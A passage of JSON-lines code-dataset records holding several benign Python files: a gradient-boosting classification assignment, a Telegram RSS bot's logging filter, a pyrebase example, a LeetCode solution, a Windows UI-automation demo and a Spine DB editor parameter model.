positive and negative examples.\nvalidation_safe_loans = validation_data[validation_data[target] == 1]\nvalidation_risky_loans = validation_data[validation_data[target] == -1]\n\n# Select 2 examples from the validation set for positive & negative loans\nsample_validation_data_risky = validation_risky_loans[0:2]\nsample_validation_data_safe = validation_safe_loans[0:2]\nsample_validation_data = sample_validation_data_safe.append(sample_validation_data_risky)\n\npredicted1 = sample_validation_data['safe_loans'].as_matrix()\npredicted2 = model_5.predict(sample_validation_data.drop('safe_loans', axis=1).as_matrix())\nprobabilities = model_5.predict_proba(sample_validation_data.drop('safe_loans', axis=1).as_matrix())\nprint(predicted1)\nprint(predicted2)\nprint(probabilities)\n\n\n# Evaluating the model on the validation data\nvalidation_Y = validation_data['safe_loans'].as_matrix()\nvalidation_X = validation_data.drop('safe_loans', axis=1).as_matrix()\naccuracy = model_5.score(validation_X, validation_Y) * 100\nprobabilities = model_5.predict_proba(validation_X)\nprobabilities = probabilities[:, 0]\nvalidation_data['predictions'] = probabilities\nhighest_5_predictions = validation_data.sort_values('predictions').head(5)\nprint(accuracy)\nprint(highest_5_predictions['predictions'])\n\n\n#####################################################################################################################\n\n\n# Effect of adding more trees\nmodel_10 = GradientBoostingClassifier(n_estimators=10, max_depth=6).fit(train_X, train_Y)\nmodel_50 = GradientBoostingClassifier(n_estimators=50, max_depth=6).fit(train_X, train_Y)\nmodel_100 = GradientBoostingClassifier(n_estimators=100, max_depth=6).fit(train_X, train_Y)\nmodel_200 = GradientBoostingClassifier(n_estimators=200, max_depth=6).fit(train_X, train_Y)\nmodel_500 = GradientBoostingClassifier(n_estimators=500, max_depth=6).fit(train_X, train_Y)\n\n\n# Plot the training and validation error vs. number of trees\n\ntrain_err_10 = 1 - model_10.score(train_X, train_Y)\ntrain_err_50 = 1 - model_50.score(train_X, train_Y)\ntrain_err_100 = 1 - model_100.score(train_X, train_Y)\ntrain_err_200 = 1 - model_200.score(train_X, train_Y)\ntrain_err_500 = 1 - model_500.score(train_X, train_Y)\ntraining_errors = [train_err_10, train_err_50, train_err_100,\n train_err_200, train_err_500]\n\n\nvalidation_err_10 = 1 - model_10.score(validation_X, validation_Y)\nvalidation_err_50 = 1 - model_50.score(validation_X, validation_Y)\nvalidation_err_100 = 1 - model_100.score(validation_X, validation_Y)\nvalidation_err_200 = 1 - model_200.score(validation_X, validation_Y)\nvalidation_err_500 = 1 - model_500.score(validation_X, validation_Y)\nvalidation_errors = [validation_err_10, validation_err_50, validation_err_100,\n validation_err_200, validation_err_500]\n\n\nn_trees = [10, 50, 100, 200, 500]\nplt.plot([10, 50, 100, 200, 500], training_errors, linewidth=4.0, label='Training error')\nplt.plot([10, 50, 100, 200, 500], validation_errors, linewidth=4.0, label='Validation error')\nmake_figure(dim=(10, 5), title='Error vs number of trees',\n xlabel='Number of trees',\n ylabel='Classification error',\n legend='best')\n", "repo_name": "MohamedAboBakr/Machine_Learning_WU_Specialization_Classification", "sub_path": "W5_Exploring Ensemble Methods/Assignment.py", "file_name": "Assignment.py", "file_ext": "py", "file_size_in_byte": 7087, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 74, "usage_type": "call"}, {"api_name": "json.load", "line_number": 84, "usage_type": "call"}, {"api_name": "json.load", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 133, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}]}
+{"seq_id": "29397391314", "text": "import asyncio\nimport logging\nimport colorlog\nfrom threading import Thread\n\nfrom src import env\n\ngetLogger = colorlog.getLogger\n\ncolorlog.basicConfig(format='%(log_color)s%(asctime)s:%(levelname)s:%(name)s - %(message)s',\n datefmt='%Y-%m-%d-%H:%M:%S',\n level=colorlog.DEBUG if env.DEBUG else colorlog.INFO)\n\n_muted = colorlog.INFO if env.DEBUG else colorlog.WARNING\n_shut_upped = colorlog.ERROR if env.DEBUG else colorlog.CRITICAL\n\ngetLogger('apscheduler').setLevel(colorlog.WARNING)\ngetLogger('aiohttp_retry').setLevel(_muted)\ngetLogger('asyncio').setLevel(_muted)\ngetLogger('telethon').setLevel(_muted)\ngetLogger('aiosqlite').setLevel(_muted)\ngetLogger('tortoise').setLevel(_muted)\ngetLogger('asyncpg').setLevel(_muted)\n\n\n# flit log from apscheduler.scheduler\nclass APSCFilter(logging.Filter):\n def __init__(self):\n super().__init__()\n self.count = -3 # first 3 times muted\n\n def filter(self, record: logging.LogRecord) -> bool:\n msg = record.msg % record.args\n if 'skipped: maximum number of running instances reached' in msg:\n self.count += 1\n if self.count % 5 == 0:\n if self.count >= 15:\n exit(-1)\n coro = env.bot.send_message(\n env.MANAGER,\n 'RSS monitor tasks have conflicted too many times! Please store the log and restart.\\n'\n ' (sometimes it may be caused by too many subscriptions)\\n\\n'\n + msg\n )\n Thread(target=asyncio.run, args=(coro,)).start()\n return True\n if ' executed successfully' in msg:\n self.count = -3 # only >= 4 consecutive failures lead to a manager warning\n return False\n if 'Running job \"rss_monitor ' in msg:\n return False\n return True\n\n\napsc_filter = APSCFilter()\ngetLogger('apscheduler.scheduler').addFilter(apsc_filter)\ngetLogger('apscheduler.executors.default').addFilter(apsc_filter)\n", "repo_name": "rcy1314/Telegramrssfeed", "sub_path": "src/log.py", "file_name": "log.py", "file_ext": "py", "file_size_in_byte": 2038, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "colorlog.getLogger", "line_number": 8, "usage_type": "attribute"}, {"api_name": "colorlog.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "src.env.DEBUG", "line_number": 12, "usage_type": "attribute"}, {"api_name": "src.env", "line_number": 12, "usage_type": "name"}, {"api_name": "colorlog.DEBUG", "line_number": 12, "usage_type": "attribute"}, {"api_name": "colorlog.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "src.env.DEBUG", "line_number": 14, "usage_type": "attribute"}, {"api_name": "src.env", "line_number": 14, "usage_type": "name"}, {"api_name": "colorlog.INFO", "line_number": 14, "usage_type": "attribute"}, {"api_name": "colorlog.WARNING", "line_number": 14, "usage_type": "attribute"}, {"api_name": "src.env.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "src.env", "line_number": 15, "usage_type": "name"}, {"api_name": "colorlog.ERROR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "colorlog.CRITICAL", "line_number": 15, "usage_type": "attribute"}, {"api_name": "colorlog.WARNING", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.Filter", "line_number": 27, "usage_type": "attribute"}, {"api_name": "logging.LogRecord", "line_number": 32, "usage_type": "attribute"}, {"api_name": "src.env.bot.send_message", "line_number": 39, "usage_type": "call"}, {"api_name": "src.env.bot", "line_number": 39, "usage_type": "attribute"}, {"api_name": "src.env", "line_number": 39, "usage_type": "name"}, {"api_name": "src.env.MANAGER", "line_number": 40, "usage_type": "attribute"}, {"api_name": "src.env", "line_number": 40, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 45, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 45, "usage_type": "attribute"}]}
+{"seq_id": "39556165633", "text": "import pyrebase\n\nconfig = {\n \"apiKey\": \"AIzaSyB_JDKzdASym_BESMe_mmXLtzL8K5glj1M\",\n \"authDomain\": \"hackgt-traffic.firebaseapp.com\",\n \"databaseURL\": \"https://hackgt-traffic.firebaseio.com/\",\n \"storageBucket\": \"hackgt-traffic.appspot.com\"\n}\n\nfirebase = pyrebase.initialize_app(config)\n\ndb = firebase.database()\ndb.child(\"cameras\").child(\"2\")\ndata = 123\ndb.set(data)\n", "repo_name": "keptsecret/hackgt6-traffic-rtanalysis", "sub_path": "firebase-helloworld.py", "file_name": "firebase-helloworld.py", "file_ext": "py", "file_size_in_byte": 367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pyrebase.initialize_app", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "29993885364", "text": "from typing import List\n\n\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n if not strs:\n return \"\"\n \n if len(strs) == 1:\n return strs[0]\n \n result = strs[0]\n for i in range(1, len(strs)):\n length = min(len(result), len(strs[i]))\n k = 0\n while k < length:\n if result[k] == strs[i][k]:\n k += 1\n else:\n break\n result = result[:k]\n \n return \"\".join(result)\n ", "repo_name": "JoanWu5/leetcode-lintcode-python", "sub_path": "string/14. Longest Common Prefix.py", "file_name": "14. Longest Common Prefix.py", "file_ext": "py", "file_size_in_byte": 582, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "typing.List", "line_number": 5, "usage_type": "name"}]}
+{"seq_id": "13557008896", "text": "#!python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport time\nimport subprocess\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) # not required after 'pip install uiautomation'\nimport uiautomation as automation\n\n\ndef main():\n cmdWindow = automation.GetConsoleWindow()\n subprocess.Popen('mmc.exe devmgmt.msc')\n time.sleep(1)\n mmcWindow = automation.WindowControl(searchDepth = 1, ClassName = 'MMCMainFrame')\n tree = mmcWindow.TreeControl()\n for item, depth in automation.WalkControl(tree, includeTop = True):\n if isinstance(item, automation.TreeItemControl): #or item.ControlType == automation.ControlType.TreeItemControl\n item.Select()\n if automation.ExpandCollapseState.Collapsed == item.CurrentExpandCollapseState():\n item.Expand(0)\n automation.Logger.WriteLine(' ' * (depth - 1) * 4 + item.Name, automation.ConsoleColor.Green)\n time.sleep(0.1)\n if cmdWindow:\n automation.Logger.ColorfulWriteLine('Scroll to top by SendKeys Ctrl+Home ')\n cmdWindow.SetActive(waitTime = 1)\n mmcWindow.SetActive(waitTime = 1)\n tree.SendKeys('{Ctrl}{Home}', waitTime = 1)\n if cmdWindow:\n automation.Logger.ColorfulWriteLine('Scroll to bottom by SendKeys Ctrl+End ')\n cmdWindow.SetActive(waitTime = 1)\n mmcWindow.SetActive(waitTime = 1)\n tree.SendKeys('{Ctrl}{End}', waitTime = 1)\n if cmdWindow:\n automation.Logger.ColorfulWriteLine('Scroll to top by WheelUp ')\n cmdWindow.SetActive(waitTime = 1)\n print(tree.Handle, tree.Element, len(tree.GetChildren()))\n # before expand, tree has no scrollbar. after expand, tree has a scrollbar.\n # need to Refind on some PCs before find ScrollBarControl from tree\n # maybe the old element has no scrollbar info\n tree.Refind()\n print(tree.Handle, tree.Element, len(tree.GetChildren()))\n vScrollBar = tree.ScrollBarControl(AutomationId = 'NonClientVerticalScrollBar')\n vScrollBarRect = vScrollBar.BoundingRectangle\n thumb = vScrollBar.ThumbControl()\n while True:\n vPercent = tree.CurrentVerticalScrollPercent()\n vPercent2 = vScrollBar.RangeValuePatternCurrentValue()\n print('TreeControl.CurrentVerticalScrollPercent', vPercent)\n print('ScrollBarControl.RangeValuePatternCurrentValue', vPercent2)\n if vPercent2 > 0:\n tree.WheelUp(waitTime = 0.1)\n else:\n break\n if cmdWindow:\n automation.Logger.ColorfulWriteLine('Scroll to bottom by WheelDown ')\n cmdWindow.SetActive(waitTime = 1)\n while True:\n vPercent = tree.CurrentVerticalScrollPercent()\n vPercent2 = vScrollBar.RangeValuePatternCurrentValue()\n print('TreeControl.CurrentVerticalScrollPercent', vPercent)\n print('ScrollBarControl.RangeValuePatternCurrentValue', vPercent2)\n if vPercent2 < 100:\n tree.WheelDown(waitTime = 0.1)\n else:\n break\n if cmdWindow:\n automation.Logger.ColorfulWriteLine('Scroll by DragDrop ')\n cmdWindow.SetActive(waitTime = 1)\n mmcWindow.SetActive(waitTime = 1)\n x, y = thumb.MoveCursorToMyCenter()\n automation.DragDrop(x, y, x, vScrollBarRect[1], waitTime = 1)\n x, y = thumb.MoveCursorToMyCenter()\n automation.DragDrop(x, y, x, vScrollBarRect[3])\n mmcWindow.Close()\n\n\nif __name__ == '__main__':\n main()\n cmdWindow = automation.GetConsoleWindow()\n if cmdWindow:\n cmdWindow.SetActive()\n input('\\npress Enter to exit\\n')\n", "repo_name": "guolaok/Python-UIAutomation-for-Windows", "sub_path": "demos/automation_devicemanager.py", "file_name": "automation_devicemanager.py", "file_ext": "py", "file_size_in_byte": 3623, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "uiautomation.GetConsoleWindow", "line_number": 14, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 15, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 16, "usage_type": "call"}, {"api_name": "uiautomation.WindowControl", "line_number": 17, "usage_type": "call"}, {"api_name": "uiautomation.WalkControl", "line_number": 19, "usage_type": "call"}, {"api_name": "uiautomation.TreeItemControl", "line_number": 20, "usage_type": "attribute"}, {"api_name": "uiautomation.ExpandCollapseState", "line_number": 22, "usage_type": "attribute"}, {"api_name": "uiautomation.Logger.WriteLine", "line_number": 24, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 24, "usage_type": "attribute"}, {"api_name": "uiautomation.ConsoleColor", "line_number": 24, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "uiautomation.Logger.ColorfulWriteLine", "line_number": 27, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 27, "usage_type": "attribute"}, {"api_name": "uiautomation.Logger.ColorfulWriteLine", "line_number": 32, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 32, "usage_type": "attribute"}, {"api_name": "uiautomation.Logger.ColorfulWriteLine", "line_number": 37, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 37, "usage_type": "attribute"}, {"api_name": "uiautomation.Logger.ColorfulWriteLine", "line_number": 58, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 58, "usage_type": "attribute"}, {"api_name": "uiautomation.Logger.ColorfulWriteLine", "line_number": 70, "usage_type": "call"}, {"api_name": "uiautomation.Logger", "line_number": 70, "usage_type": "attribute"}, {"api_name": "uiautomation.DragDrop", "line_number": 74, "usage_type": "call"}, {"api_name": "uiautomation.DragDrop", "line_number": 76, "usage_type": "call"}, {"api_name": "uiautomation.GetConsoleWindow", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "31698715801", "text": "from PySide6.QtCore import Qt, Slot, QTimer, QModelIndex\nfrom PySide6.QtGui import QFont\nfrom spinedb_api.parameter_value import join_value_and_type\nfrom ...helpers import rows_to_row_count_tuples, parameter_identifier\nfrom ...fetch_parent import FlexibleFetchParent\nfrom ..widgets.custom_menus import ParameterViewFilterMenu\nfrom ...mvcmodels.compound_table_model import CompoundWithEmptyTableModel\nfrom .empty_parameter_models import (\n EmptyObjectParameterDefinitionModel,\n EmptyObjectParameterValueModel,\n EmptyRelationshipParameterDefinitionModel,\n EmptyRelationshipParameterValueModel,\n)\nfrom .single_parameter_models import (\n SingleObjectParameterDefinitionModel,\n SingleObjectParameterValueModel,\n SingleRelationshipParameterDefinitionModel,\n SingleRelationshipParameterValueModel,\n)\n\n\nclass CompoundParameterModel(CompoundWithEmptyTableModel):\n \"\"\"A model that concatenates several single parameter models\n and one empty parameter model.\n \"\"\"\n\n def __init__(self, parent, db_mngr, *db_maps):\n \"\"\"\n Args:\n parent (SpineDBEditor): the parent object\n db_mngr (SpineDBManager): the database manager\n *db_maps (DiffDatabaseMapping): the database maps included in the model\n \"\"\"\n super().__init__(parent=parent, header=self._make_header())\n self._parent = parent\n self.db_mngr = db_mngr\n self.db_maps = db_maps\n self._filter_class_ids = {}\n self._auto_filter_menus = {}\n self._auto_filter = {}\n self._filter_timer = QTimer(self)\n self._filter_timer.setSingleShot(True)\n self._filter_timer.setInterval(100)\n self._filter_timer.timeout.connect(self.refresh)\n self._fetch_parent = FlexibleFetchParent(\n self.item_type,\n accepts_item=self.accepts_item,\n shows_item=self.shows_item,\n handle_items_added=self.handle_items_added,\n handle_items_removed=self.handle_items_removed,\n handle_items_updated=self.handle_items_updated,\n owner=self,\n )\n\n def canFetchMore(self, _parent):\n result = False\n for db_map in self.db_maps:\n result |= self.db_mngr.can_fetch_more(db_map, self._fetch_parent)\n return result\n\n def fetchMore(self, _parent):\n for db_map in self.db_maps:\n self.db_mngr.fetch_more(db_map, self._fetch_parent)\n\n def accepts_item(self, item, db_map):\n return item.get(self.entity_class_id_key) is not None\n\n def shows_item(self, item, db_map):\n return any(m.db_map == db_map and m.filter_accepts_item(item) for m in self.accepted_single_models())\n\n def _make_header(self):\n raise NotImplementedError()\n\n @property\n def entity_class_type(self):\n \"\"\"Returns the entity_class type, either 'object_class' or 'relationship_class'.\n\n Returns:\n str\n \"\"\"\n raise NotImplementedError()\n\n @property\n def item_type(self):\n \"\"\"Returns the parameter item type, either 'parameter_definition' or 'parameter_value'.\n\n Returns:\n str\n \"\"\"\n raise NotImplementedError()\n\n @property\n def _single_model_type(self):\n \"\"\"\n Returns a constructor for the single models.\n\n Returns:\n SingleParameterModel\n \"\"\"\n return {\n \"object_class\": {\n \"parameter_definition\": SingleObjectParameterDefinitionModel,\n \"parameter_value\": SingleObjectParameterValueModel,\n },\n \"relationship_class\": {\n \"parameter_definition\": SingleRelationshipParameterDefinitionModel,\n \"parameter_value\": SingleRelationshipParameterValueModel,\n },\n }[self.entity_class_type][self.item_type]\n\n @property\n def _empty_model_type(self):\n \"\"\"\n Returns a constructor for the empty model.\n\n Returns:\n EmptyParameterModel\n \"\"\"\n return {\n \"object_class\": {\n \"parameter_definition\": EmptyObjectParameterDefinitionModel,\n \"parameter_value\": EmptyObjectParameterValueModel,\n },\n \"relationship_class\": {\n \"parameter_definition\": EmptyRelationshipParameterDefinitionModel,\n \"parameter_value\": EmptyRelationshipParameterValueModel,\n },\n }[self.entity_class_type][self.item_type]\n\n @property\n def entity_class_id_key(self):\n \"\"\"\n Returns the key corresponding to the entity_class id (either \"object_class_id\" or \"relationship_class_id\")\n\n Returns:\n str\n \"\"\"\n return {\"object_class\": \"object_class_id\", \"relationship_class\": \"relationship_class_id\"}[\n self.entity_class_type\n ]\n\n @property\n def parameter_definition_id_key(self):\n return {\"parameter_definition\": \"id\", \"parameter_value\": \"parameter_id\"}[self.item_type]\n\n def init_model(self):\n \"\"\"Initializes the model.\"\"\"\n super().init_model()\n self._filter_class_ids = {}\n self._auto_filter = {}\n self.empty_model.fetchMore(QModelIndex())\n while self._auto_filter_menus:\n _, menu = self._auto_filter_menus.popitem()\n menu.wipe_out()\n\n def get_auto_filter_menu(self, logical_index):\n \"\"\"Returns auto filter menu for given logical index from header view.\n\n Args:\n logical_index (int)\n\n Returns:\n ParameterViewFilterMenu\n \"\"\"\n return self._make_auto_filter_menu(self.header[logical_index])\n\n def _make_auto_filter_menu(self, field):\n if field not in self._auto_filter_menus:\n self._auto_filter_menus[field] = menu = ParameterViewFilterMenu(\n self._parent,\n self.db_mngr,\n self.db_maps,\n self.item_type,\n self.entity_class_id_key,\n field,\n show_empty=False,\n )\n menu.filterChanged.connect(self.set_auto_filter)\n return self._auto_filter_menus[field]\n\n def headerData(self, section, orientation=Qt.Orientation.Horizontal, role=Qt.ItemDataRole.DisplayRole):\n \"\"\"Returns an italic font in case the given column has an autofilter installed.\"\"\"\n italic_font = QFont()\n italic_font.setItalic(True)\n if (\n role == Qt.ItemDataRole.FontRole\n and orientation == Qt.Orientation.Horizontal\n and self._auto_filter.get(self.header[section], {}) != {}\n ):\n return italic_font\n return super().headerData(section, orientation, role)\n\n def _create_empty_model(self):\n \"\"\"Returns the empty model for this compound model.\n\n Returns:\n EmptyParameterModel\n \"\"\"\n return self._empty_model_type(self, self.header, self.db_mngr)\n\n def filter_accepts_model(self, model):\n \"\"\"Returns a boolean indicating whether the given model passes the filter for compound model.\n\n Args:\n model (SingleParameterModel, EmptyParameterModel)\n\n Returns:\n bool\n \"\"\"\n if not model.can_be_filtered:\n return True\n if not self._auto_filter_accepts_model(model):\n return False\n if not self._class_filter_accepts_model(model):\n return False\n return True\n\n def _class_filter_accepts_model(self, model):\n if not self._filter_class_ids:\n return True\n return model.entity_class_id in self._filter_class_ids.get(model.db_map, set())\n\n def _auto_filter_accepts_model(self, model):\n if None in self._auto_filter.values():\n return False\n for values in self._auto_filter.values():\n if not values:\n continue\n for db_map, entity_class_id in values:\n if model.db_map == db_map and (entity_class_id is None or model.entity_class_id == entity_class_id):\n break\n else: # nobreak\n return False\n return True\n\n def accepted_single_models(self):\n \"\"\"Returns a list of accepted single models by calling filter_accepts_model\n on each of them, just for convenience.\n\n Returns:\n list\n \"\"\"\n return [m for m in self.single_models if self.filter_accepts_model(m)]\n\n def _invalidate_filter(self):\n \"\"\"Sets the filter invalid.\"\"\"\n self._filter_timer.start()\n\n def stop_invalidating_filter(self):\n \"\"\"Stops invalidating the filter.\"\"\"\n self._filter_timer.stop()\n\n def set_filter_class_ids(self, class_ids):\n if class_ids != self._filter_class_ids:\n self._filter_class_ids = class_ids\n self._invalidate_filter()\n\n def clear_auto_filter(self):\n self._auto_filter = {}\n self._invalidate_filter()\n\n @Slot(str, object)\n def set_auto_filter(self, field, values):\n \"\"\"Updates and applies the auto filter.\n\n Args:\n field (str): the field name\n values (dict): mapping (db_map, entity_class_id) to set of valid values\n \"\"\"\n self._set_compound_auto_filter(field, values)\n for model in self.accepted_single_models():\n self._set_single_auto_filter(model, field)\n\n def _set_compound_auto_filter(self, field, values):\n \"\"\"Sets the auto filter for given column in the compound model.\n\n Args:\n field (str): the field name\n values (set): set of valid (db_map, item_type, id) tuples\n \"\"\"\n if self._auto_filter.setdefault(field, {}) == values:\n return\n self._auto_filter[field] = values\n self._invalidate_filter()\n\n def _set_single_auto_filter(self, model, field):\n \"\"\"Sets the auto filter for given column in the given single model.\n\n Args:\n model (SingleParameterModel): the model\n field (str): the field name\n\n Returns:\n bool: True if the auto-filtered values were updated, None otherwise\n \"\"\"\n values = self._auto_filter[field].get((model.db_map, model.entity_class_id), set())\n if model.set_auto_filter(field, values):\n self._invalidate_filter()\n\n def _row_map_iterator_for_model(self, model):\n \"\"\"Yields row map for the given model.\n Reimplemented to take filter status into account.\n\n Args:\n model (SingleParameterModel, EmptyParameterModel)\n\n Yields:\n tuple: (model, row number) for each accepted row\n \"\"\"\n if not self.filter_accepts_model(model):\n return ()\n for i in model.accepted_rows():\n yield (model, i)\n\n def _models_with_db_map(self, db_map):\n \"\"\"Returns a collection of single models with given db_map.\n\n Args:\n db_map (DiffDatabaseMapping)\n\n Returns:\n list\n \"\"\"\n return [m for m in self.single_models if m.db_map == db_map]\n\n def _items_per_class(self, items):\n \"\"\"Returns a dict mapping entity_class ids to a set of items.\n\n Args:\n items (list)\n\n Returns:\n dict\n \"\"\"\n d = dict()\n for item in items:\n entity_class_id = item.get(self.entity_class_id_key)\n if not entity_class_id:\n continue\n d.setdefault(entity_class_id, list()).append(item)\n return d\n\n def handle_items_added(self, db_map_data):\n \"\"\"Runs when either parameter definitions or values are added to the dbs.\n Adds necessary sub-models and initializes them with data.\n Also notifies the empty model so it can remove rows that are already in.\n\n Args:\n db_map_data (dict): list of added dict-items keyed by DiffDatabaseMapping\n \"\"\"\n for db_map, items in db_map_data.items():\n db_map_single_models = [m for m in self.single_models if m.db_map is db_map]\n existing_ids = set().union(*(m.item_ids() for m in db_map_single_models))\n items_per_class = self._items_per_class(items)\n for entity_class_id, class_items in items_per_class.items():\n ids_committed = list()\n ids_uncommitted = list()\n for item in class_items:\n is_committed = db_map.commit_id() is None or item[\"commit_id\"] != db_map.commit_id()\n item_id = item[\"id\"]\n if item_id in existing_ids:\n continue\n if is_committed:\n ids_committed.append(item_id)\n else:\n ids_uncommitted.append(item_id)\n self._add_parameter_data(db_map, entity_class_id, ids_committed, committed=True)\n self._add_parameter_data(db_map, entity_class_id, ids_uncommitted, committed=False)\n self.empty_model.handle_items_added(db_map_data)\n\n def _get_insert_position(self, model):\n if model.committed:\n return super()._get_insert_position(model)\n return len(self.single_models)\n\n def _create_single_model(self, db_map, entity_class_id, committed):\n model = self._single_model_type(self.header, self.db_mngr, db_map, entity_class_id, committed)\n self._connect_single_model(model)\n for field in self._auto_filter:\n self._set_single_auto_filter(model, field)\n return model\n\n def _add_parameter_data(self, db_map, entity_class_id, ids, committed):\n \"\"\"Creates new single model and resets it with the given parameter ids.\n\n Args:\n db_map (DiffDatabaseMapping): database map\n entity_class_id (int): parameter's entity class id\n ids (list of int): parameter ids\n committed (bool): True if the ids have been committed, False otherwise\n \"\"\"\n if not ids:\n return\n if committed:\n existing = next(\n (m for m in self.single_models if (m.db_map, m.entity_class_id) == (db_map, entity_class_id)), None\n )\n if existing is not None:\n existing.add_rows(ids)\n return\n model = self._create_single_model(db_map, entity_class_id, committed)\n model.reset_model(ids)\n\n def handle_items_updated(self, db_map_data):\n \"\"\"Runs when either parameter definitions or values are updated in the dbs.\n Emits dataChanged so the parameter_name column is refreshed.\n\n Args:\n db_map_data (dict): list of updated dict-items keyed by DiffDatabaseMapping\n \"\"\"\n self._emit_data_changed_for_column(\"parameter_name\")\n # NOTE: parameter_definition names aren't refreshed unless we emit dataChanged,\n # whereas entity and class names are. Why?\n\n def handle_items_removed(self, db_map_data):\n \"\"\"Runs when either parameter definitions or values are removed from the dbs.\n Removes the affected rows from the corresponding single models.\n\n Args:\n db_map_data (dict): list of removed dict-items keyed by DiffDatabaseMapping\n \"\"\"\n self.layoutAboutToBeChanged.emit()\n for db_map, items in db_map_data.items():\n items_per_class = self._items_per_class(items)\n for model in self._models_with_db_map(db_map):\n removed_ids = [x[\"id\"] for x in items_per_class.get(model.entity_class_id, {})]\n if not removed_ids:\n continue\n removed_rows = [row for row in range(model.rowCount()) if model._main_data[row] in removed_ids]\n for row, count in sorted(rows_to_row_count_tuples(removed_rows), reverse=True):\n del model._main_data[row : row + count]\n self._do_refresh()\n self.layoutChanged.emit()\n\n def _emit_data_changed_for_column(self, field):\n \"\"\"Lazily emits data changed for an entire column.\n\n Args:\n field (str): the column header\n \"\"\"\n try:\n column = self.header.index(field)\n except ValueError:\n return\n self.dataChanged.emit(\n self.index(0, column), self.index(self.rowCount() - 1, column), [Qt.ItemDataRole.DisplayRole]\n )\n\n def db_item(self, index):\n sub_index = self.map_to_sub(index)\n return sub_index.model().db_item(sub_index)\n\n def db_map_id(self, index):\n sub_index = self.map_to_sub(index)\n sub_model = sub_index.model()\n if sub_model is None:\n return None, None\n return sub_model.db_map, sub_model.item_id(sub_index.row())\n\n def index_name(self, index):\n \"\"\"Generates a name for data at given index.\n\n Args:\n index (QModelIndex): index to model\n\n Returns:\n str: label identifying the data\n \"\"\"\n item = self.db_item(index)\n if item is None:\n return \"\"\n database = self.index(index.row(), self.columnCount() - 1).data()\n name_key = {\n \"parameter_definition\": {\n \"object_class\": \"object_class_name\",\n \"relationship_class\": \"relationship_class_name\",\n },\n \"parameter_value\": {\"object_class\": \"object_name\", \"relationship_class\": \"object_name_list\"},\n }[self.item_type][self.entity_class_type]\n name = item[name_key]\n names = [name] if not isinstance(name, tuple) else list(name)\n alternative_name = {\"parameter_definition\": lambda x: None, \"parameter_value\": lambda x: 